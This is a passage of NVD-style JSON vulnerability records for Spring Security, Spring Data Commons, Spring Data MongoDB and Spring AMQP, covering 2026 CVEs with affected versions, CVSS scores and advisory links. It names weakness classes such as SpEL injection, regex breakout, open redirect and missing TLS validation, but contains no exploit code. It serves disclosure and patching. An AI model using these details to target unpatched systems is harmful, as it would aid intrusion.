Security","defaultStatus":"unaffected","versions":[{"version":"5.7.0","lessThan":"5.7.24","versionType":"custom","status":"affected"},{"version":"5.8.0","lessThan":"5.8.26","versionType":"custom","status":"affected"},{"version":"6.3.0","lessThan":"6.3.17","versionType":"custom","status":"affected"},{"version":"6.4.0","lessThan":"6.4.17","versionType":"custom","status":"affected"},{"version":"6.5.0","lessThan":"6.5.10.2","versionType":"custom","status":"affected"},{"version":"7.0.0","lessThan":"7.0.5.1","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":3.7,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.2,"impactScore":1.4},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-10T18:54:16.996908Z","id":"CVE-2026-41694","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-347"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"5.7.0","versionEndExcluding":"5.7.24","matchCriteriaId":"AB5C2BB6-3DED-4AFA-B2F7-5D0D68F04E1F"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"5.8.0","versionEndExcluding":"5.8.26","matchCriteriaId":"55C5A1C3-2071-41EE-A218-B36A531072AC"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"6.3.0","versionEndExcluding":"6.3.17","matchCriteriaId":"A4B7CBD7-3497-4BBB-88EF-B88F9F4C4409"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"6.4.0","versionEndExcluding":"6.4.17","matchCriteriaId":"B4CF2BF5-E039-4C56-B68E-E98CC82327CE"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"6.5.0","versionEndExcluding":"6.5.10.2","matchCriteriaId":"428C07AD-7D54-4C8B-ACD7-3A3A9EAEE1ED"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"7.0.0","versionEndExcluding":"7.0.5.1","matchCriteriaId":"C7E64BE1-964C-47F7-AB49-34F0699BF9AF"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41694","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41695","sourceIdentifier":"security@vmware.com","published":"2026-06-10T00:16:50.683","lastModified":"2026-07-17T20:36:05.867","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Spring Data Commons applications may be vulnerable to denial of service through resource exhaustion when attacker-controlled property path strings are passed to MappingContext property path resolution.\n\nAffected versions:\nSpring Data Commons 4.0.0 through 4.0.5; 3.5.0 through 3.5.11; 3.4.0 through 3.4.14."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Data Commons","defaultStatus":"unaffected","versions":[{"version":"4.0.0","lessThan":"4.0.5.1","versionType":"custom","status":"affected"},{"version":"3.5.0","lessThan":"3.5.11.1","versionType":"custom","status":"affected"},{"version":"3.4.0","lessThan":"3.4.15","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-10T17:55:11.129479Z","id":"CVE-2026-41695","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-400"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_commons:*:*:*:*:*:*:*:*","versionStartIncluding":"3.4.0","versionEndExcluding":"3.4.15","matchCriteriaId":"71619FB3-3E66-4E7F-ACFC-724535FC83E8"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_commons:*:*:*:*:*:*:*:*","versionStartIncluding":"3.5.0","versionEndExcluding":"3.5.11.1","matchCriteriaId":"1137CA9F-F171-417E-9550-D85ED95C8021"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_commons:*:*:*:*:*:*:*:*","versionStartIncluding":"4.0.0","versionEndExcluding":"4.0.5.1","matchCriteriaId":"6F2D14A5-1310-4EF0-A943-D2DB5549C25E"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41695","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41696","sourceIdentifier":"security@vmware.com","published":"2026-06-10T00:16:50.800","lastModified":"2026-07-17T20:34:52.170","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Spring Data MongoDB repository query methods annotated with @Query that use regex parameter binding perform insufficient validation of the bound parameter. An attacker can supply a crafted string to break out of the intended regular expression quoting.\n\nAffected versions:\nSpring Data MongoDB 5.0.0 through 5.0.5; 4.5.0 through 4.5.11; 4.4.0 through 4.4.14; 4.3.0 through 4.3.16; 4.2.0 through 4.2.15; 4.1.0 through 4.1.14; 4.0.0 through 4.0.15; 3.4.0 through 3.4.19."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Data MongoDB","defaultStatus":"unaffected","versions":[{"version":"5.0.0","lessThan":"5.0.6","versionType":"custom","status":"affected"},{"version":"4.5.0","lessThan":"4.5.12","versionType":"custom","status":"affected"},{"version":"4.4.0","lessThan":"4.4.15","versionType":"custom","status":"affected"},{"version":"4.3.0","lessThan":"4.3.17","versionType":"custom","status":"affected"},{"version":"4.2.0","lessThan":"4.2.16","versionType":"custom","status":"affected"},{"version":"4.1.0","lessThan":"4.1.15","versionType":"custom","status":"affected"},{"version":"4.0.0","lessThan":"4.0.16","versionType":"custom","status":"affected"},{"version":"3.4.0","lessThan":"3.4.20","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":5.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.2,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-10T17:52:05.245642Z","id":"CVE-2026-41696","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-943"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_mongodb:*:*:*:*:*:*:*:*","versionStartIncluding":"3.4.0","versionEndExcluding":"3.4.20","matchCriteriaId":"7E55F58B-81A9-4912-9573-5B452BC55E51"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_mongodb:*:*:*:*:*:*:*:*","versionStartIncluding":"4.0.0","versionEndIncluding":"4.0.15","matchCriteriaId":"1BEBCD2A-409F-4DEF-AF40-9EEC62A099C2"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_mongodb:*:*:*:*:*:*:*:*","versionStartIncluding":"4.1.0","versionEndIncluding":"4.1.14","matchCriteriaId":"A5820FCC-F941-4399-B2B9-EDC5EE3F6953"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_mongodb:*:*:*:*:*:*:*:*","versionStartIncluding":"4.2.0","versionEndIncluding":"4.2.15","matchCriteriaId":"67E36C20-FF20-4F82-B161-74E3838D67FD"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_mongodb:*:*:*:*:*:*:*:*","versionStartIncluding":"4.3.0","versionEndExcluding":"4.3.17","matchCriteriaId":"A5BFEA5F-410F-441E-9DC9-34C03B566E50"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_mongodb:*:*:*:*:*:*:*:*","versionStartIncluding":"4.4.0","versionEndExcluding":"4.4.15","matchCriteriaId":"F0BD2306-031F-4D72-BC3E-19ACB886E73D"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_mongodb:*:*:*:*:*:*:*:*","versionStartIncluding":"4.5.0","versionEndExcluding":"4.5.11.1","matchCriteriaId":"D21BA806-10F0-4DA5-9DB6-A669FA01E1CE"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_mongodb:*:*:*:*:*:*:*:*","versionStartIncluding":"5.0.0","versionEndExcluding":"5.0.5.1","matchCriteriaId":"5F530EDE-94AE-42FA-A6FE-458CAC0B7EF3"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41696","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41706","sourceIdentifier":"security@vmware.com","published":"2026-06-10T00:16:51.223","lastModified":"2026-07-17T20:34:32.450","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Spring Security's CookieRequestCache and CookieServerRequestCache store the pre-authentication request URL in a browser cookie so that users can be redirected back to their intended destination after a successful login. In affected versions, the full absolute URL is stored in the cookie and is used without validation as the post-login redirect target.\n\nAffected versions:\nSpring Security 5.7.0 through 5.7.23; 5.8.0 through 5.8.25; 6.3.0 through 6.3.16; 6.4.0 through 6.4.16; 6.5.0 through 6.5.10; 7.0.0 through 7.0.5."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Security","defaultStatus":"unaffected","versions":[{"version":"5.7.0","lessThan":"5.7.24","versionType":"custom","status":"affected"},{"version":"5.8.0","lessThan":"5.8.26","versionType":"custom","status":"affected"},{"version":"6.3.0","lessThan":"6.3.17","versionType":"custom","status":"affected"},{"version":"6.4.0","lessThan":"6.4.17","versionType":"custom","status":"affected"},{"version":"6.5.0","lessThan":"6.5.10.2","versionType":"custom","status":"affected"},{"version":"7.0.0","lessThan":"7.0.5.1","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-10T13:03:12.093082Z","id":"CVE-2026-41706","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-601"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionEndExcluding":"5.7.24","matchCriteriaId":"9D14FE16-4FF0-4866-B982-BF7EA8440E26"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"5.8.0","versionEndExcluding":"5.8.26","matchCriteriaId":"55C5A1C3-2071-41EE-A218-B36A531072AC"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"6.3.0","versionEndExcluding":"6.3.17","matchCriteriaId":"A4B7CBD7-3497-4BBB-88EF-B88F9F4C4409"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"6.4.0","versionEndExcluding":"6.4.17","matchCriteriaId":"B4CF2BF5-E039-4C56-B68E-E98CC82327CE"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"6.5.0","versionEndExcluding":"6.5.10.2","matchCriteriaId":"428C07AD-7D54-4C8B-ACD7-3A3A9EAEE1ED"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*","versionStartIncluding":"7.0.0","versionEndExcluding":"7.0.5.1","matchCriteriaId":"C7E64BE1-964C-47F7-AB49-34F0699BF9AF"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41706","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41711","sourceIdentifier":"security@vmware.com","published":"2026-06-10T00:16:51.337","lastModified":"2026-07-17T20:33:43.827","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Applications using Spring Data Commons may be vulnerable to a Denial of Service (DoS) attack leading to a StackOverflowException when parsing Sort parameters.\n\nAffected versions:\nSpring Data Commons 4.0.0 through 4.0.5; 3.5.0 through 3.5.11; 3.4.0 through 3.4.14; 3.3.0 through 3.3.16; 3.2.0 through 3.2.15; 3.1.0 through 3.1.14; 3.0.0 through 3.0.15; 2.7.0 through 2.7.19."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Data Commons","defaultStatus":"unaffected","versions":[{"version":"4.0.0","lessThan":"4.0.5.1","versionType":"custom","status":"affected"},{"version":"3.5.0","lessThan":"3.5.11.1","versionType":"custom","status":"affected"},{"version":"3.4.0","lessThan":"3.4.15","versionType":"custom","status":"affected"},{"version":"3.3.0","lessThan":"3.3.17","versionType":"custom","status":"affected"},{"version":"3.2.0","lessThan":"3.2.16","versionType":"custom","status":"affected"},{"version":"3.1.0","lessThan":"3.1.15","versionType":"custom","status":"affected"},{"version":"3.0.0","lessThan":"3.0.16","versionType":"custom","status":"affected"},{"version":"2.7.0","lessThan":"2.7.20","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":5.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.2,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-10T13:02:19.970074Z","id":"CVE-2026-41711","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-400"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_commons:*:*:*:*:*:*:*:*","versionStartIncluding":"2.7.0","versionEndExcluding":"2.7.20","matchCriteriaId":"14A934B2-D150-47FE-9E80-6EB0C35970A8"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_commons:*:*:*:*:*:*:*:*","versionStartIncluding":"3.0.0","versionEndIncluding":"3.0.15","matchCriteriaId":"17005B9A-8DC0-4086-9856-849CC07133F2"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_commons:*:*:*:*:*:*:*:*","versionStartIncluding":"3.1.0","versionEndIncluding":"3.1.14","matchCriteriaId":"497C0C07-F7AE-410F-A2E9-B545EE613FB6"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_commons:*:*:*:*:*:*:*:*","versionStartIncluding":"3.2.0","versionEndIncluding":"3.2.15","matchCriteriaId":"69002579-B593-40DE-A9A1-9C573F89A57C"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_commons:*:*:*:*:*:*:*:*","versionStartIncluding":"3.3.0","versionEndExcluding":"3.3.17","matchCriteriaId":"9E4B8538-532D-49DA-8EF3-0D2D0571F9CC"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_commons:*:*:*:*:*:*:*:*","versionStartIncluding":"3.4.0","versionEndExcluding":"3.4.15","matchCriteriaId":"71619FB3-3E66-4E7F-ACFC-724535FC83E8"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_commons:*:*:*:*:*:*:*:*","versionStartIncluding":"3.5.0","versionEndExcluding":"3.5.11.1","matchCriteriaId":"1137CA9F-F171-417E-9550-D85ED95C8021"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_commons:*:*:*:*:*:*:*:*","versionStartIncluding":"4.0.0","versionEndExcluding":"4.0.5.1","matchCriteriaId":"6F2D14A5-1310-4EF0-A943-D2DB5549C25E"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41711","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41714","sourceIdentifier":"security@vmware.com","published":"2026-06-10T00:16:51.450","lastModified":"2026-07-17T20:30:37.790","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Applications that configure their broker connection via RabbitConnectionFactoryBean.setUri(\"amqps://...\") without also calling setUseSSL(true) get TLS encryption with no certificate validation and no hostname verification.\n\nAffected versions:\nSpring AMQP 4.0.0 through 4.0.3; 3.2.0 through 3.2.10; 3.1.0 through 3.1.15; 2.4.0 through 2.4.17."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring AMQP","defaultStatus":"unaffected","versions":[{"version":"4.0.0","lessThan":"4.0.3.1","versionType":"custom","status":"affected"},{"version":"3.2.0","lessThan":"3.2.10.1","versionType":"custom","status":"affected"},{"version":"3.1.0","lessThan":"3.1.16","versionType":"custom","status":"affected"},{"version":"2.4.0","lessThan":"2.4.18","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N","baseScore":4.0,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.2,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-10T13:01:58.139774Z","id":"CVE-2026-41714","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-295"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_advanced_message_queuing_protocol:*:*:*:*:*:*:*:*","versionEndExcluding":"2.4.18","matchCriteriaId":"DB49D810-90EE-4068-AB44-4B0E9F33724B"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_advanced_message_queuing_protocol:*:*:*:*:*:*:*:*","versionStartIncluding":"3.1.0","versionEndExcluding":"3.1.16","matchCriteriaId":"404605C1-1718-44F1-A3BD-03A162758CD6"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_advanced_message_queuing_protocol:*:*:*:*:*:*:*:*","versionStartIncluding":"3.2.0","versionEndExcluding":"3.2.10.1","matchCriteriaId":"DE2DE5C3-2284-4DFA-9034-5F5FC7DE85A0"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_advanced_message_queuing_protocol:*:*:*:*:*:*:*:*","versionStartIncluding":"4.0.0","versionEndExcluding":"4.0.3.1","matchCriteriaId":"4D538ABA-784E-4ACC-8B56-326C62020872"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41714","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41716","sourceIdentifier":"security@vmware.com","published":"2026-06-10T00:16:51.567","lastModified":"2026-07-17T20:33:15.127","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Spring Data's internal property-lookup cache accepts and permanently retains attacker-supplied strings as cache keys, allowing heap exhaustion through repeated requests.\n\nAffected versions:\nSpring Data Commons 2.7.0 through 2.7.19; 3.3.0 through 3.3.16; 3.4.0 through 3.4.14; 3.5.0 through 3.5.11; 4.0.0 through 4.0.5."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Data Commons","defaultStatus":"unaffected","versions":[{"version":"2.7.0","lessThan":"2.7.20","versionType":"custom","status":"affected"},{"version":"3.3.0","lessThan":"3.3.17","versionType":"custom","status":"affected"},{"version":"3.4.0","lessThan":"3.4.15","versionType":"custom","status":"affected"},{"version":"3.5.0","lessThan":"3.5.11.1","versionType":"custom","status":"affected"},{"version":"4.0.0","lessThan":"4.0.5.1","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-10T12:50:22.403656Z","id":"CVE-2026-41716","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-770"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_commons:*:*:*:*:*:*:*:*","versionStartIncluding":"2.7.0","versionEndExcluding":"2.7.20","matchCriteriaId":"14A934B2-D150-47FE-9E80-6EB0C35970A8"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_commons:*:*:*:*:*:*:*:*","versionStartIncluding":"3.3.0","versionEndExcluding":"3.3.17","matchCriteriaId":"9E4B8538-532D-49DA-8EF3-0D2D0571F9CC"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_commons:*:*:*:*:*:*:*:*","versionStartIncluding":"3.4.0","versionEndExcluding":"3.4.15","matchCriteriaId":"71619FB3-3E66-4E7F-ACFC-724535FC83E8"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_commons:*:*:*:*:*:*:*:*","versionStartIncluding":"3.5.0","versionEndExcluding":"3.5.11.1","matchCriteriaId":"1137CA9F-F171-417E-9550-D85ED95C8021"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_commons:*:*:*:*:*:*:*:*","versionStartIncluding":"4.0.0","versionEndExcluding":"4.0.5.1","matchCriteriaId":"6F2D14A5-1310-4EF0-A943-D2DB5549C25E"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41716","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41717","sourceIdentifier":"security@vmware.com","published":"2026-06-10T00:16:51.683","lastModified":"2026-07-17T20:32:44.080","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Spring Data MongoDB contains a SpEL (Spring Expression Language) expression injection vulnerability. The issue occurs during parameter binding when a user-defined repository query method is annotated with @Query and utilizes a capture-all placeholder.\n\nAffected versions:\nSpring Data MongoDB 5.0.0 through 5.0.5; 4.5.0 through 4.5.11; 4.4.0 through 4.4.14; 4.3.0 through 4.3.16; 4.2.0 through 4.2.15; 4.1.0 through 4.1.14; 4.0.0 through 4.0.15; 3.4.0 through 3.4.19."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Data MongoDB","defaultStatus":"unaffected","versions":[{"version":"5.0.0","lessThan":"5.0.5.1","versionType":"custom","status":"affected"},{"version":"4.5.0","lessThan":"4.5.11.1","versionType":"custom","status":"affected"},{"version":"4.4.0","lessThan":"4.4.15","versionType":"custom","status":"affected"},{"version":"4.3.0","lessThan":"4.3.17","versionType":"custom","status":"affected"},{"version":"4.2.0","lessThan":"4.2.16","versionType":"custom","status":"affected"},{"version":"4.1.0","lessThan":"4.1.15","versionType":"custom","status":"affected"},{"version":"4.0.0","lessThan":"4.0.16","versionType":"custom","status":"affected"},{"version":"3.4.0","lessThan":"3.4.20","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.2,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-10T00:00:00+00:00","id":"CVE-2026-41717","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-917"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_mongodb:*:*:*:*:*:*:*:*","versionStartIncluding":"3.4.0","versionEndExcluding":"3.4.20","matchCriteriaId":"7E55F58B-81A9-4912-9573-5B452BC55E51"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_mongodb:*:*:*:*:*:*:*:*","versionStartIncluding":"4.0.0","versionEndExcluding":"4.0.16","matchCriteriaId":"DEF77DA7-2F90-432C-8993-EF12D9AC4540"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_mongodb:*:*:*:*:*:*:*:*","versionStartIncluding":"4.1.0","versionEndExcluding":"4.1.15","matchCriteriaId":"445103F2-9A1F-439A-BE81-3B516C10839D"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_mongodb:*:*:*:*:*:*:*:*","versionStartIncluding":"4.2.0","versionEndExcluding":"4.2.16","matchCriteriaId":"013F48F6-7CBB-4F70-8A5B-4CF016B4DEB4"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_mongodb:*:*:*:*:*:*:*:*","versionStartIncluding":"4.3.0","versionEndExcluding":"4.3.17","matchCriteriaId":"A5BFEA5F-410F-441E-9DC9-34C03B566E50"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_mongodb:*:*:*:*:*:*:*:*","versionStartIncluding":"4.4.0","versionEndExcluding":"4.4.15","matchCriteriaId":"F0BD2306-031F-4D72-BC3E-19ACB886E73D"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_mongodb:*:*:*:*:*:*:*:*","versionStartIncluding":"4.5.0","versionEndIncluding":"4.5.11.1","matchCriteriaId":"5FCD5F74-2A0E-411F-8DB4-375486A66D1F"},{"